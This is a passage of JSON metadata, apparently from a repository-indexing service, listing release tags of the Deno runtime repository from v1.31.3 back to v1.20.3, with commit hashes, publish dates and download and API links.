a":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z